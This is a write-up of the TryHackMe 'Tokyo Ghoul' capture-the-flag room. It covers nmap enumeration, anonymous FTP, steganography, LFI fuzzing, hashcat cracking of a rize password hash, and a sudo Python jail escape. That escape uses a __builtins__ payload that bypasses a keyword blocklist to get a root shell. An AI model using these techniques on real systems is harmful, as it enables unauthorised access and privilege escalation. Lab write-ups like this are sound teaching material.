Tokyo Ghoul — TryHackMe

This is a write-up for TryHackme’s room named “Tokyo Ghoul”. Please find this room here:
Task is to find the user and root’s flag and along the way answer the questions asked. So let’s Help kaneki escape jason room and start enumeration process using NMAP.
Enumeration
NMAP
# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p- 10.10.0.178
$ sudo nmap -sS -Pn -T4 -p- 10.10.0.178
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.178
$ sudo nmap -O -A -Pn -T4 -p21,22,80 10.10.0.178
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x 3 ftp ftp 4096 Jan 23 22:26 need_Help?
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.8.98.192
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 fa:9e:38:d3:95:df:55:ea:14:c9:49:d8:0a:61:db:5e (RSA)
| 256 ad:b7:a7:5e:36:cb:32:a0:90:90:8e:0b:98:30:8a:97 (ECDSA)
|_ 256 a2:a2:c8:14:96:c5:20:68:85:e5:41:d0:aa:53:8b:bd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome To Tokyo goul
From the scan results we can answer the question asked in first section.
HTTP Port 80
Checking Web Port 80 using a browser, found the following text in the Web Page’s source of the link on the main page(Can you help him escape?)
<!-- look don't tell jason but we will help you escape , here is some clothes to look like us and a mask to look anonymous and go to the ftp room right there you will find a friend who will help you -->
OK, so let’s check out the FTP which has anonymous access enabled.
FTP
Found these 3 files by checking all the directories accessible by FTP:
- Aogiri_tree.txt : this gives us hint that we are after someone called “Rize”
- need_to_talk: this gives is key for “Rize” exe
- rize_and_kaneki.jpg: To get other note from Rize
Ran rabin -z
on need_to_talk
executable and found the key, which is used as input after running need_to_talk

Ghidra can also be used to analyse this exe and if we hover the mouse on the values highlighted in the middle section, that will give us the key:

Finally the exe gave us the key for rize_and_kaneki.jpg
which was cracked using steghide
:
$ steghide info rize_and_kaneki.jpg
"rize_and_kaneki.jpg":
format: jpeg
capacity: 2.7 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
embedded file "yougotme.txt":
size: 377.0 Byte
encrypted: rijndael-128, cbc
compressed: yes$ steghide extract -sf rize_and_kaneki.jpg
Enter passphrase:
wrote extracted data to "yougotme.txt".
$ cat yougotme.txt
haha you are so smart kaneki but can you talk my code..... .-
....- ....-
....- -....
--... ----.
....- -..
...-- ..---
....- -..
...-- ...--
....- -..
....- ---..
....- .-
...-- .....
..... ---..
...-- ..---
....- .
-.... -.-.
-.... ..---
-.... .
..... ..---
-.... -.-.
-.... ...--
-.... --...
...-- -..
...-- -..if you can talk it all right you got my secret directory
This looks like Morse Code. Using CyberChef to decode this:

This gives us a directory, which after appending to the main web-page gives us a hint to scan it, so using FFUF to scan this:
$ ffuf -u http://10.10.3.63/[REDACTED]/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c /'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/v1.2.1
________________________________________________:: Method : GET
:: URL : http://10.10.3.63/[REDACTED]/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________index.html [Status: 200, Size: 312, Words: 21, Lines: 15]
claim [Status: 301, Size: 325, Words: 20, Lines: 10]
.html [Status: 403, Size: 275, Words: 20, Lines: 10]
.php [Status: 403, Size: 275, Words: 20, Lines: 10]
[Status: 200, Size: 312, Words: 21, Lines: 15]
:: Progress: [882184/882184] :: Job [1/1] :: 1840 req/sec :: Duration: [0:09:05] :: Errors: 0 ::
So lets browse to the “claim” directory via the browser:

And the by clicking on either YES or NO we can see a param “view” which can be checked for Local File Inclusion vulnerability:

Capture this request in the BurpSuite and then send it to the Intruder tab and use the following LFI list from seclist which by default comes with kali as the payload:
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt

Ah ha, it worked and the username and password hash for rize are exposed.Put the hash found above in a file named hash.txt and taking the hash type starting with $6$ from hashcat website:

Use the following command to crack the password hash:
hashcat -m 1800 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
The hash will be cracked very fast, as it is a very commonly used password :)
User.txt
Now use the rize’s username and password found above and login using SSH on to the target.User flag is in rize’s home directory:

Root.txt
Now check what rize can run on the target as root using sudo -l
:

So rize can run jail.py
. Let’s have a look at it:
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Hi! Welcome to my world kaneki")
print("===========================================================")
print("What ? You gonna stand like a chicken ? fight me Kaneki")
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print("Do you think i will let you do this ??????")
return;
else:
exec(text)
print('No Kaneki you are so dead')
if __name__ == "__main__":
main()
We need to break this “jail” as few of the keyword listed in the for loop above will not let us execute the python commands which can give us the root shell. Also we cannot edit this file as we don’t have the permission to do so.Found a lot of techniques here to bypass python sandboxes and the python builtins
proved to be very useful to bypass the restrictions and used the following as input to the jail.py
script:
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('/bin/bash')
And ran this to get the root shell:
sudo /usr/bin/python3 /home/kamishiro/jail.py

Hope you enjoyed reading it as I had a lot of fun solving this challenge specially the python jail break and learned a new thing.Thanks for reading and have a nice day!